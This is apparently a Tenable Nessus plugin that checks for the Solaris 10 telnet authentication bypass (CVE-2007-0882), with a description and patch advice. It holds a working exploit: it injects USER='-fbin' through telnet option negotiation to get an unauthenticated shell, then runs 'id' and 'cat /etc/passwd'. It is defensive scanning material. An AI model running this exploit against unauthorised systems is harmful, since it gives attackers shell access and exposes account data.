#
# (C) Tenable Network Security, Inc.
#

  desc["english"] = "
Synopsis :

It is possible to log into the remote system using telnet without
supplying any credentials

Description :

The remote version of telnet does not sanitize the user-supplied
'USER' environment variable. By supplying a specially malformed
USER environment variable, an attacker may force the remote 
telnet server to believe that the user has already authenticated.

For instance, the following command :


	telnet -l '-fbin' targethost 

Will result in obtaining a shell with the privileges of the 'bin'
user.

Solution :

Install patches 120068-02 (sparc) or 120069-02 (i386)
which are available from Sun.

Filter incoming to this port or disable the telnet service 
and use SSH instead, or use inetadm to mitigate this 
problem (see the link below).

See also : 

http://lists.sans.org/pipermail/list/2007-February/025935.html
http://isc.sans.org/diary.html?storyid=2220

Risk factor : 

Critical / CVSS Base Score : 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)";

if (description) {
  script_id(24323);
  script_cve_id("CVE-2007-0882");
  script_bugtraq_id(22512);
  script_xref(name:"OSVDB", value:"31881");
  script_version("$Revision: 1.12 $");
  name["english"] = "Solaris 10 Telnet Authentication Bypass";
  script_name(english:name["english"]);
 

  script_description(english:desc["english"]);
 
  summary["english"] = "Attempts to log in as -fbin";
  script_summary(english:summary["english"]);
 
  script_category(ACT_ATTACK);
 
  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  family["english"] = "Gain root remotely";
  script_family(english:family["english"]);

  script_dependencie("find_service1.nasl");
  script_require_ports("Services/telnet", 23);
  exit(0);
}


OPT_WILL        = 0xfb;
OPT_WONT        = 0xfc;
OPT_DO          = 0xfd;
OPT_DONT        = 0xfe;

OPT_SUBOPT      = 0xfa;
OPT_ENDSUBOPT   = 0xf0;

OPT_ENV		= 0x27;

port = get_kb_item("Services/telnet");
if(!port) port = 23;
if(!get_port_state(port))exit(0);


soc = open_sock_tcp(port);
if ( ! soc ) exit(0);

send(socket:soc, data:raw_string(0xff, OPT_WILL, OPT_ENV));

timeout = 5;

while ( TRUE )
{
 counter ++;
 if ( counter > 200 ) break;
 s = recv(socket:soc, length:1, timeout:timeout);
 timeout = 5;
 if ( strlen(s) == 0 ) break; # End of options ?
 if ( ord(s[0]) != 0xff )
	 break;

  else {
	 s = recv(socket:soc, length:2);
	 if ( strlen(s) != 2 ) break;
  	 if ( ord(s[0]) == OPT_DO && ord(s[1]) == OPT_ENV )
	 {
	  send(socket:soc, data:raw_string(0xff, OPT_SUBOPT, OPT_ENV) + raw_string(0,0) + 'USER' + raw_string(1) + '-fbin' + raw_string(0xff, OPT_ENDSUBOPT));
	 }
	 else if ( ord(s[0]) == OPT_DO && ord(s[1]) != OPT_ENV ) send(socket:soc, data:raw_string(0xff, OPT_WONT) + s[1]);
  	 else if ( ord(s[0]) == OPT_WILL ) send(socket:soc, data:raw_string(0xff, OPT_DONT) + s[1]);
 	 else if ( ord(s[0]) == OPT_SUBOPT )
	 {
	  prev = recv(socket:socket, length:1);
          counter2 = 0;
          while ( strlen(prev) && ord(prev[0]) != 0xff && ord(s[0]) != OPT_ENDSUBOPT )
           {
            prev = s;
            # No timeout - the answer is supposed to be cached
            s    = recv(socket:socket, length:1, timeout:0);
            if ( ! strlen(s) ) exit(0);
            counter2++;
            if ( counter2 >= 100 ) exit(0);
	  }
	 }
  	}
}

r = recv(socket:soc, length:4096);
send(socket:soc, data:'id\r\n');
r = recv(socket:soc, length:4096);
if ( (uid =  egrep(pattern:"uid=", string:r)) )
{
 send(socket:soc, data:'cat /etc/passwd\r\n');
 passwd = recv(socket:soc, length:65535);
 report = str_replace(find:"targethost", replace:get_host_ip(), string:desc["english"]) + '\n\nPlugin output :\n\n' +
	'It was possible to log into the remote host as \'bin\' :\n' + uid + '\nThe file /etc/passwd contains :\n\n' + passwd;
 security_hole(port:23, data:report);
} 




